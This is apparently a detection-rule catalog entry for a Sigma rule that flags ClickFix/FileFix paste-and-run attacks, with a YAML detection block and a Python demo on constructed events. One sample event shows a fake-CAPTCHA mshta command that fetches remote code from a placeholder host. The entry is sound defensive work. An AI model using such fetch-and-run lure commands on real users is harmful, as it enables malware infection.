Suspicious ClickFix/FileFix Execution Pattern
Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar (FileFix). Attackers leverage social engineering campaigns—such as fake CAPTCHA challenges or urgent alerts—encouraging victims to paste clipboard contents, often executing mshta.exe, powershell.exe, or similar commands to infect systems.
MITRE ATT&CK coverage
| Tactic | Techniques |
|---|---|
| Execution | T1204.001 User Execution: Malicious Link, T1204.004 User Execution: Malicious Copy and Paste |
Event coverage
| Provider | Event ID | Title |
|---|---|---|
| Sysmon | 1 | Process creation |
| Security-Auditing | 4688 | A new process has been created. |
Stages and Predicates

Both stages must match on the same process-creation event: stage 1 requires a process spawned by explorer.exe (the Run dialog and the File Explorer address bar both run as children of explorer.exe) with a `#` in its command line, and stage 2 requires at least one CAPTCHA/verification keyword in that command line. Written as the rule's Sigma detection block:

```yaml
detection:
  selection_parent:            # Stage 1: all of selection_parent (both predicates)
    ParentImage|endswith: '\explorer.exe'
    CommandLine|contains: '#'
  selection_cli_captcha:       # Stage 2: all of selection_cli_captcha (any one value)
    CommandLine|contains:
      - 'account'
      - 'anti-bot'
      - 'botcheck'
      - 'captcha'
      - 'challenge'
      - 'confirmation'
      - 'fraud'
      - 'human'
      - 'identification'
      - 'identificator'
      - 'identity'
      - 'robot'
      - 'validation'
      - 'verification'
      - 'verify'
  condition: selection_parent and selection_cli_captcha
```
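As an added illustration that is not part of the rule catalog, the following Python applies the two stages above to a handful of constructed process-creation events and reports which keyword fired, which is what an analyst wants first during triage. The event shape, the sample command lines and the `example.invalid` host are assumptions; Sigma string modifiers are case-insensitive, so the comparison lowercases the values.

```python
from dataclasses import dataclass

# Predicates from the rule above; Sigma string modifiers are case-insensitive,
# so every comparison below is done on lowercased values.
PARENT_SUFFIX = "\\explorer.exe"
CAPTCHA_KEYWORDS = [
    "account", "anti-bot", "botcheck", "captcha", "challenge", "confirmation",
    "fraud", "human", "identification", "identificator", "identity", "robot",
    "validation", "verification", "verify",
]


@dataclass
class ProcessEvent:
    """Minimal process-creation event (Sysmon EID 1 / Security 4688 fields)."""
    parent_image: str
    image: str
    command_line: str


def matched_keywords(ev: ProcessEvent) -> list:
    """Keywords from selection_cli_captcha found in the command line (for triage)."""
    cmd = ev.command_line.lower()
    return [k for k in CAPTCHA_KEYWORDS if k in cmd]


def matches_rule(ev: ProcessEvent) -> bool:
    """Stage 1 AND stage 2: explorer.exe parent with '#' in the command line,
    plus at least one CAPTCHA/verification keyword."""
    selection_parent = (ev.parent_image.lower().endswith(PARENT_SUFFIX)
                        and "#" in ev.command_line)
    return selection_parent and bool(matched_keywords(ev))


def run_detection(events):
    """Return (image, matched keywords) for every event the rule fires on."""
    return [(ev.image, matched_keywords(ev)) for ev in events if matches_rule(ev)]


# Constructed sample events, not real telemetry; the hostname is a placeholder.
SAMPLE_EVENTS = [
    # ClickFix: Run dialog (parent explorer.exe) launches mshta; the trailing
    # '#' comment mimics a CAPTCHA confirmation string shown to the victim.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://example.invalid/a # I am not a robot - reCAPTCHA Verification ID: 4719"),
    # FileFix: File Explorer address bar (parent explorer.exe) launches powershell.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -c "Get-Date" # Human Verification Step 2'),
    # Keyword present but no '#' in the command line: stage 1 fails.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\App\app.exe",
                 '"C:\\Program Files\\App\\app.exe" --verify-update'),
    # '#' and keyword present but the parent is not explorer.exe: stage 1 fails.
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd /c echo captcha # test"),
]
```

Note that `human` and `account` are short substrings, so the `#` and explorer.exe-parent requirements carry most of the rule's precision; the matched keyword list helps decide quickly whether a hit is a real paste-and-run or an ordinary command line that happens to contain one of them.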
Indicators
Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.
| Field | Kind | Values |
|---|---|---|
| CommandLine | match | '#', account, anti-bot, botcheck, captcha, challenge, confirmation, fraud, human, identification, identificator, identity, robot, validation, verification, verify |
| ParentImage | ends_with | '\explorer.exe' |